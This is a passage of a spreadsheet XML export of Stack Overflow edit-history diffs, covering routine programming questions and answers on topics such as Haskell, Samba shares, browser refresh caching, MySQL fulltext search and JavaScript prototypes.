 &lt;p&gt;&lt;span class="diff-add"&gt;(from &lt;/span&gt;&lt;a href="http://www.intel.com/cd/ids/developer/asmo-na/eng/197664.htm?page=2" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;http://www.intel.com/cd/ids/developer/asmo-na/eng/197664.htm?page=2&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-add"&gt;)&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; What should I use? Should I define something like &lt;/span&gt;&lt;code&gt;&lt;span class="diff-add"&gt;uw&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-add"&gt;, &lt;/span&gt;&lt;code&gt;&lt;span class="diff-add"&gt;sw&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-add"&gt; ((un)signed width) as a &lt;/span&gt;&lt;code&gt;&lt;span class="diff-add"&gt;long&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-add"&gt; if not on Windows, and otherwise do a check on the target CPU bitsize?&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>dbush</t>
  </si>
  <si>
    <t>user34537</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Here is a one-liner for you, if &lt;span class="diff-delete"&gt;youre&lt;/span&gt; still interested:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;zipWith (:) [1..] $ take (maximum $ map length tAll) _x000D_
                         (transpose (map (++repeat 0) tAll))_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; edit: OK, it's better to write it with two lines :)&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Here is a one-liner for you, if &lt;span class="diff-add"&gt;you're&lt;/span&gt; still interested:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;zipWith (:) [1..] $ take (maximum $ map length tAll) _x000D_
                         (transpose (map (++repeat 0) tAll))_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; edit: OK, it's better to write it with two lines :)&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Probably &lt;span class="diff-delete"&gt;[this][1]&lt;/span&gt; prototype function:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;$$(cssRule...) -&amp;gt; [HTMLElement...]_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; Takes an arbitrary number of CSS selectors (strings) and returns a document-order array of extended DOM elements that match any of them.&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.prototypejs.org/api/utility#method-%24%24" rel="nofollow noreferrer"&gt;http://www.prototypejs.org/api/utility#method-$$&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Probably &lt;a href="http://www.prototypejs.org/api/utility#method-%24%24" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;this&lt;/span&gt;&lt;/a&gt; prototype function:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;$$(cssRule...) -&amp;gt; [HTMLElement...]_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; Takes an arbitrary number of CSS selectors (strings) and returns a document-order array of extended DOM elements that match any of them.&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.prototypejs.org/api/utility#method-%24%24" rel="nofollow noreferrer"&gt;http://www.prototypejs.org/api/utility#method-$$&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Mihai Limb??an</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have a samba network share on a FreeBSD box that I use for development.&lt;/p&gt; _x000D_
 &lt;p&gt; I have it set up as a shared drive on my WinXP box, and it works fine.&lt;/p&gt; _x000D_
 &lt;p&gt; However, if I reboot the xp box, the shared drive will not be accessible until I click on it and enter the password, even though I have set it to use the correct username and password and to connect at startup.&lt;/p&gt; _x000D_
 &lt;p&gt; Does anyone know offhand what might be the issue? &lt;span class="diff-delete"&gt; I&lt;/span&gt; can get version data, etc. if necessary, but wanted to hang this out there briefly to see if it might be a common samba issue.&lt;/p&gt; _x000D_
 &lt;p&gt; Thanks!&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;span class="diff-delete"&gt; &amp;nbsp;&lt;/span&gt; _x000D_
 &lt;p&gt; EDIT:&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;Thanks for the ideas&lt;/span&gt;! &lt;span class="diff-delete"&gt; Will the Net Use option make it so my mapped drive will work without auth?&lt;/span&gt; I have the &lt;span class="diff-delete"&gt;user/pass&lt;/span&gt; stored in the mapped drive&lt;span class="diff-delete"&gt; options&lt;/span&gt;, &lt;span class="diff-delete"&gt;but&lt;/span&gt; it &lt;span class="diff-delete"&gt;seems like they are&lt;/span&gt; not &lt;span class="diff-delete"&gt;used&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have a samba network share on a FreeBSD box that I use for development.&lt;/p&gt; _x000D_
 &lt;p&gt; I have it set up as a shared drive on my WinXP box, and it works fine.&lt;/p&gt; _x000D_
 &lt;p&gt; However, if I reboot the xp box, the shared drive will not be accessible until I click on it and enter the password, even though I have set it to use the correct username and password and to connect at startup.&lt;/p&gt; _x000D_
 &lt;p&gt; Does anyone know offhand what might be the issue? &lt;span class="diff-add"&gt;I&lt;/span&gt; can get version data, etc. if necessary, but wanted to hang this out there briefly to see if it might be a common samba issue.&lt;/p&gt; _x000D_
 &lt;p&gt; Thanks!&lt;/p&gt; _x000D_
 &lt;p&gt; EDIT:&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;So Sorry&lt;/span&gt;! &lt;span class="diff-add"&gt;I thought I had said I have XP Pro.&lt;/span&gt; I&lt;span class="diff-add"&gt; actually&lt;/span&gt; have the &lt;span class="diff-add"&gt;auth&lt;/span&gt; stored in the mapped drive, &lt;span class="diff-add"&gt;where&lt;/span&gt; it &lt;span class="diff-add"&gt;says "authenticate using user." I also use the same username for the samba share as the xp login, though&lt;/span&gt; not &lt;span class="diff-add"&gt;the same pw&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; For those who are wondering why is this overload being done on the first place please check &lt;/span&gt;&lt;a href="http://stackoverflow.com/questions/384587/c-im-stuck-filling-this-bst-with-its-proper-values"&gt;&lt;span class="diff-add"&gt;C++ I'm stuck filling this BST with its proper values&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; I need two search functions to be able to properly fill in the words of the dictionary and later define its synonyms/antonyms.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>andandandand</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is there any &lt;strong&gt;Standard&lt;/strong&gt; for F5 and Ctrl+F5 action in browser?&lt;/p&gt; _x000D_
 &lt;p&gt; I once did experiment in IE6 and Firefox 2.x. The "F5" will trigger HTTP request sent to server end with "If-Modified-Since" header, while "Ctrl+F5" doesn't have such header. In my understanding, F5 will try to utilize cached content as much as possible; and "Ctrl+F" is intended to abandon all cached content and just retrieve content from servers again. I once wrote about it in &lt;a href="http://morganchengmo.spaces.live.com/blog/cns!9950CE918939932E!2144.entry" rel="nofollow noreferrer"&gt;my blog&lt;/a&gt; (which is in Chinese, because I am a Chinese).&lt;/p&gt; _x000D_
 &lt;p&gt; Today, I suddenly found that in latest browser such as Chrome, IE8. It doesn't work in this way any more. Both "F5" and "Ctrl + F5" send "If-Modified-Since" header.&lt;/p&gt; _x000D_
 &lt;p&gt; I'm wondering whether there is some "standard" behaviors for "F5" and "Ctrl+F5" in browser.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is there any &lt;strong&gt;Standard&lt;/strong&gt; for F5 and Ctrl+F5 action in browser?&lt;/p&gt; _x000D_
 &lt;p&gt; I once did experiment in IE6 and Firefox 2.x. The "F5" will trigger HTTP request sent to server end with "If-Modified-Since" header, while "Ctrl+F5" doesn't have such header. In my understanding, F5 will try to utilize cached content as much as possible; and "Ctrl+F" is intended to abandon all cached content and just retrieve content from servers again. I once wrote about it in &lt;a href="http://morganchengmo.spaces.live.com/blog/cns!9950CE918939932E!2144.entry" rel="nofollow noreferrer"&gt;my blog&lt;/a&gt; (which is in Chinese, because I am a Chinese).&lt;/p&gt; _x000D_
 &lt;p&gt; Today, I suddenly found that in latest browser such as Chrome, IE8. It doesn't work in this way any more. Both "F5" and "Ctrl + F5" send "If-Modified-Since" header.&lt;/p&gt; _x000D_
 &lt;p&gt; I'm wondering whether there is some "standard" behaviors for "F5" and "Ctrl+F5" in browser.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Update: Thanks to &lt;/span&gt;&lt;a href="http://blog.httpwatch.com/2007/10/19/using-ctrlf5-in-ie-7/" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;this link&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-add"&gt;. It turns out that IE7/IE8 behaves like this because the focus is not inside web page. However, it seems that Chrome doesn't define "Ctrl + F5". So, its "Ctrl+F5" behaves exactly as "F5" does.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Morgan Cheng</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; There is a schema for fields:&lt;/p&gt; _x000D_
 &lt;pre class="lang-vb prettyprint-override"&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;Set cn = CurrentProject.Connection_x000D_
_x000D_
SelectFieldName = "SomeFieldName" _x000D_
_x000D_
'Get names of all tables that have a column = SelectFieldName '_x000D_
Set rs = cn.OpenSchema(adSchemaColumns, __x000D_
Array(Empty, Empty, Empty, SelectFieldName))_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; From: &lt;a href="http://stackoverflow.com/questions/277340/ms-access-how-to-bypasssuppress-an-error#277612"&gt;MS Access: How to bypass/suppress an error?&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; There is a schema for fields:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;Set cn = CurrentProject.Connection_x000D_
_x000D_
SelectFieldName = "SomeFieldName" _x000D_
_x000D_
'Get names of all tables that have a column = SelectFieldName '_x000D_
Set rs = cn.OpenSchema(adSchemaColumns, __x000D_
Array(Empty, Empty, Empty, SelectFieldName))_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; From: &lt;a href="http://stackoverflow.com/questions/277340/ms-access-how-to-bypasssuppress-an-error#277612"&gt;MS Access: How to bypass/suppress an error?&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Olivier Jacot-Descombes</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;I'm setting up&lt;/span&gt; a &lt;span class="diff-delete"&gt;Continuous Integration system&lt;/span&gt;.&lt;span class="diff-delete"&gt; So far&lt;/span&gt;, &lt;span class="diff-delete"&gt;I've looked at &lt;/span&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;Hudson&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-delete"&gt; (very&lt;/span&gt; easy to set up&lt;span class="diff-delete"&gt;)&lt;/span&gt;, &lt;strong&gt;&lt;span class="diff-delete"&gt;Cruise Control&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-delete"&gt; (seemed&lt;/span&gt; kinda messy&lt;span class="diff-delete"&gt;,&lt;/span&gt; but still &lt;span class="diff-delete"&gt;I&lt;/span&gt; got it working&lt;span class="diff-delete"&gt;), &lt;/span&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;Bamboo&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-delete"&gt; and &lt;/span&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;Continuum&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-delete"&gt; (ran into&lt;/span&gt; problems with &lt;span class="diff-delete"&gt;both)&lt;/span&gt;. &lt;span class="diff-delete"&gt;So before I get in too deep, I figured I would plumb&lt;/span&gt; the &lt;span class="diff-delete"&gt;collective wisdom&lt;/span&gt; of &lt;span class="diff-delete"&gt;SO:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;Which Continuous Integration Systems have you worked with, and what advantages / issues have you encountered?&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;###Duplicate of: &lt;/span&gt;&lt;a href="http://stackoverflow.com/questions/140453/continuous-integration-servers"&gt;&lt;span class="diff-add"&gt;Continuous Integration Servers&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Hi,&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Recently i've looked into several CIS and read&lt;/span&gt; a &lt;span class="diff-add"&gt;lot of articles about them&lt;/span&gt;.&lt;span class="diff-add"&gt; I'm kinda impressed by Hudson&lt;/span&gt;, &lt;span class="diff-add"&gt;because it is so&lt;/span&gt; easy to set up&lt;span class="diff-add"&gt;. I like to start a discussion about several CIS like CC&lt;/span&gt;, &lt;span class="diff-add"&gt;Bamboo, Continuum etc. It would be nice if some experienced users could tell me about difficulties of some CIS or positive things. I for example had no problems setting up Hudson. Cruise Control seemd&lt;/span&gt; kinda messy but still &lt;span class="diff-add"&gt;i&lt;/span&gt; got it working&lt;span class="diff-add"&gt; too. I had more&lt;/span&gt; problems&lt;span class="diff-add"&gt; when i tried to build a project&lt;/span&gt; with &lt;span class="diff-add"&gt;bamboo or continuum&lt;/span&gt;. &lt;span class="diff-add"&gt;Of course i just scratched on&lt;/span&gt; the &lt;span class="diff-add"&gt;surface&lt;/span&gt; of &lt;span class="diff-add"&gt;each of those systems so i hope i get some useful informations.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;thanks&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; kukudas&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Everyone is suggesting MySQL fulltext search, however you should be aware of a HUGE caveat. The Fulltext search engine is only available for the MyISAM engine&lt;span class="diff-delete"&gt; below MySQL 5.6&lt;/span&gt; (&lt;span class="diff-delete"&gt;as of MySQL 5.6, it's supported with&lt;/span&gt; InnoDB, which is the most commonly used engine due to its referential integrity and ACID compliance).&lt;/p&gt; _x000D_
 &lt;p&gt; So you have a few options:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;1.&lt;/strong&gt; The simplest approach is outlined by &lt;a href="http://particletree.com/notebook/ranked-searches-with-sql/" rel="nofollow noreferrer"&gt;Particle Tree&lt;/a&gt;. You can actaully get ranked searches off of pure SQL (no fulltext, no nothing). The SQL query below will search a table and rank results based off the number of occurrences of a string in the search fields:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;SELECT_x000D_
    SUM(((LENGTH(p.body) - LENGTH(REPLACE(p.body, 'term', '')))/4) +_x000D_
        ((LENGTH(p.body) - LENGTH(REPLACE(p.body, 'search', '')))/6))_x000D_
    AS Occurrences_x000D_
FROM_x000D_
    posts AS p_x000D_
GROUP BY_x000D_
    p.id_x000D_
ORDER BY_x000D_
    Occurrences DESC_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;em&gt;edited their example to provide a bit more clarity&lt;/em&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Variations on the above SQL query, adding WHERE statements (WHERE p.body LIKE '%whatever%you%want'), etc. will probably get you exactly what you need.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;2.&lt;/strong&gt; You can alter your database schema to support full text. Often what is done to keep the InnoDB referential integrity, ACID compliance, and speed without having to install plugins like &lt;a href="http://www.sphinxsearch.com/" rel="nofollow noreferrer"&gt;Sphinx Fulltext Search Engine&lt;/a&gt; for MySQL is to split the quote data into it's own table. Basically you would have a table Quotes that is an InnoDB table that, rather than having your TEXT field "data" you have a reference "quote_data_id" which points to the ID on a Quote_Data table which is a MyISAM table. You can do your fulltext on the MyISAM table, join the IDs returned with your InnoDB tables and voila you have your results.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;3.&lt;/strong&gt; Install &lt;a href="http://www.sphinxsearch.com/" rel="nofollow noreferrer"&gt;Sphinx&lt;/a&gt;. Good luck with this one.&lt;/p&gt; _x000D_
 &lt;p&gt; Given what you described, I would &lt;strong&gt;HIGHLY&lt;/strong&gt; recommend you take the 1st approach I presented since you have a simple database driven site. The 1st solution is simple, gets the job done quickly. Lucene will be a bitch to setup especially if you want to integrate it with the database as Lucene is designed mainly to index files not databases. Google custom site search just makes your site lose tons of reputation (makes you look amateurish and hacked), and MySQL fulltext will most likely cause you to alter your database schema.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Everyone is suggesting MySQL fulltext search, however you should be aware of a HUGE caveat. The Fulltext search engine is only available for the MyISAM engine (&lt;span class="diff-add"&gt;not&lt;/span&gt; InnoDB, which is the most commonly used engine due to its referential integrity and ACID compliance).&lt;/p&gt; _x000D_
 &lt;p&gt; So you have a few options:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;1.&lt;/strong&gt; The simplest approach is outlined by &lt;a href="http://particletree.com/notebook/ranked-searches-with-sql/" rel="nofollow noreferrer"&gt;Particle Tree&lt;/a&gt;. You can actaully get ranked searches off of pure SQL (no fulltext, no nothing). The SQL query below will search a table and rank results based off the number of occurrences of a string in the search fields:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;SELECT_x000D_
    SUM(((LENGTH(p.body) - LENGTH(REPLACE(p.body, 'term', '')))/4) +_x000D_
        ((LENGTH(p.body) - LENGTH(REPLACE(p.body, 'search', '')))/6))_x000D_
    AS Occurrences_x000D_
FROM_x000D_
    posts AS p_x000D_
GROUP BY_x000D_
    p.id_x000D_
ORDER BY_x000D_
    Occurrences DESC_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;em&gt;edited their example to provide a bit more clarity&lt;/em&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Variations on the above SQL query, adding WHERE statements (WHERE p.body LIKE '%whatever%you%want'), etc. will probably get you exactly what you need.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;2.&lt;/strong&gt; You can alter your database schema to support full text. Often what is done to keep the InnoDB referential integrity, ACID compliance, and speed without having to install plugins like &lt;a href="http://www.sphinxsearch.com/" rel="nofollow noreferrer"&gt;Sphinx Fulltext Search Engine&lt;/a&gt; for MySQL is to split the quote data into it's own table. Basically you would have a table Quotes that is an InnoDB table that, rather than having your TEXT field "data" you have a reference "quote_data_id" which points to the ID on a Quote_Data table which is a MyISAM table. You can do your fulltext on the MyISAM table, join the IDs returned with your InnoDB tables and voila you have your results.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;3.&lt;/strong&gt; Install &lt;a href="http://www.sphinxsearch.com/" rel="nofollow noreferrer"&gt;Sphinx&lt;/a&gt;. Good luck with this one.&lt;/p&gt; _x000D_
 &lt;p&gt; Given what you described, I would &lt;strong&gt;HIGHLY&lt;/strong&gt; recommend you take the 1st approach I presented since you have a simple database driven site. The 1st solution is simple, gets the job done quickly. Lucene will be a bitch to setup especially if you want to integrate it with the database as Lucene is designed mainly to index files not databases. Google custom site search just makes your site lose tons of reputation (makes you look amateurish and hacked), and MySQL fulltext will most likely cause you to alter your database schema.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Here's a jQuery way to implement Joel's suggestion:&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; $(document).ready(function() { jQuery('input[@name=__VIEWSTATE]').val("this is now bad"); }); &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Here's a jQuery way to implement Joel's suggestion:&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;&amp;lt;script language="javascript"&amp;gt;_x000D_
$(document).ready(function() {_x000D_
    jQuery('input[@name=__VIEWSTATE]').val("this is now bad");_x000D_
});_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; if you don't need to &lt;em&gt;bind&lt;/em&gt; it, try:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;Text='&amp;lt;%# string.Format("{0:HH:mm}", Eval("Appointment"))%&amp;gt;'_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; otherwise i suppose you can update the field value in the OnDataBound event.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; if you don't need to &lt;em&gt;bind&lt;/em&gt; it, try:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Text='&amp;lt;%# string.Format("{0:HH:mm}", Eval("Appointment"))%&amp;gt;'&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; otherwise i suppose you can update the field value in the OnDataBound event.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>mohacs</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Here's the way to do it without using any external libraries:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;// Define a class like this_x000D_
function Person(name, gender){_x000D_
_x000D_
   // Add object properties like this_x000D_
   this.name = name;_x000D_
   this.gender = gender;_x000D_
}_x000D_
_x000D_
// Add methods like this.  All Person objects will be able to invoke this_x000D_
Person.prototype.speak = function(){_x000D_
    alert("Howdy, my name is" + this.name);_x000D_
};_x000D_
_x000D_
// Instantiate new objects with 'new'_x000D_
var person = new Person("Bob", &lt;span class="diff-delete"&gt;"other"&lt;/span&gt;);_x000D_
_x000D_
// Invoke methods like this_x000D_
person.speak(); // alerts "Howdy, my name is Bob"_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Now the real answer is a whole lot more complex than that. For instance, there is no such thing as classes in JavaScript. JavaScript uses a &lt;code&gt;prototype&lt;/code&gt;-based inheritance scheme.&lt;/p&gt; _x000D_
 &lt;p&gt; In addition, there are numerous popular JavaScript libraries that have their own style of approximating class-like functionality in JavaScript. You'll want to check out at least &lt;a href="http://en.wikipedia.org/wiki/Prototype_JavaScript_Framework" rel="nofollow noreferrer"&gt;Prototype&lt;/a&gt; and &lt;a href="http://en.wikipedia.org/wiki/JQuery" rel="nofollow noreferrer"&gt;jQuery&lt;/a&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; Deciding which of these is the "best" is a great way to start a holy war on StackÂ&amp;nbsp;Overflow. If you're embarking on a larger JavaScript-heavy project, it's definitely worth learning a popular library and doing it their way. I'm a Prototype guy, but StackÂ&amp;nbsp;Overflow seems to lean towards jQuery.&lt;/p&gt; _x000D_
 &lt;p&gt; As far as there being only "one way to do it", without any dependencies on external libraries, the way I wrote is pretty much it.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Here's the way to do it without using any external libraries:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;// Define a class like this_x000D_
function Person(name, gender){_x000D_
_x000D_
   // Add object properties like this_x000D_
   this.name = name;_x000D_
   this.gender = gender;_x000D_
}_x000D_
_x000D_
// Add methods like this.  All Person objects will be able to invoke this_x000D_
Person.prototype.speak = function(){_x000D_
    alert("Howdy, my name is" + this.name);_x000D_
};_x000D_
_x000D_
// Instantiate new objects with 'new'_x000D_
var person = new Person("Bob", &lt;span class="diff-add"&gt;"M"&lt;/span&gt;);_x000D_
_x000D_
// Invoke methods like this_x000D_
person.speak(); // alerts "Howdy, my name is Bob"_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Now the real answer is a whole lot more complex than that. For instance, there is no such thing as classes in JavaScript. JavaScript uses a &lt;code&gt;prototype&lt;/code&gt;-based inheritance scheme.&lt;/p&gt; _x000D_
 &lt;p&gt; In addition, there are numerous popular JavaScript libraries that have their own style of approximating class-like functionality in JavaScript. You'll want to check out at least &lt;a href="http://en.wikipedia.org/wiki/Prototype_JavaScript_Framework" rel="nofollow noreferrer"&gt;Prototype&lt;/a&gt; and &lt;a href="http://en.wikipedia.org/wiki/JQuery" rel="nofollow noreferrer"&gt;jQuery&lt;/a&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; Deciding which of these is the "best" is a great way to start a holy war on StackÂ&amp;nbsp;Overflow. If you're embarking on a larger JavaScript-heavy project, it's definitely worth learning a popular library and doing it their way. I'm a Prototype guy, but StackÂ&amp;nbsp;Overflow seems to lean towards jQuery.&lt;/p&gt; _x000D_
 &lt;p&gt; As far as there being only "one way to do it", without any dependencies on external libraries, the way I wrote is pretty much it.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>user6269864</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; According to &lt;a href="http://www.quirksmode.org/js/events_order.html" rel="nofollow noreferrer"&gt;this page&lt;/a&gt;, in &lt;code&gt;&lt;span class="diff-delete"&gt;IE&lt;/span&gt;&lt;/code&gt; you need:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;event.cancelBubble = true_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; According to &lt;a href="http://www.quirksmode.org/js/events_order.html" rel="nofollow noreferrer"&gt;this page&lt;/a&gt;, in &lt;span class="diff-add"&gt;IE&lt;/span&gt; you need:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; event.cancelBubble = true&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Anik Islam Abhi</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
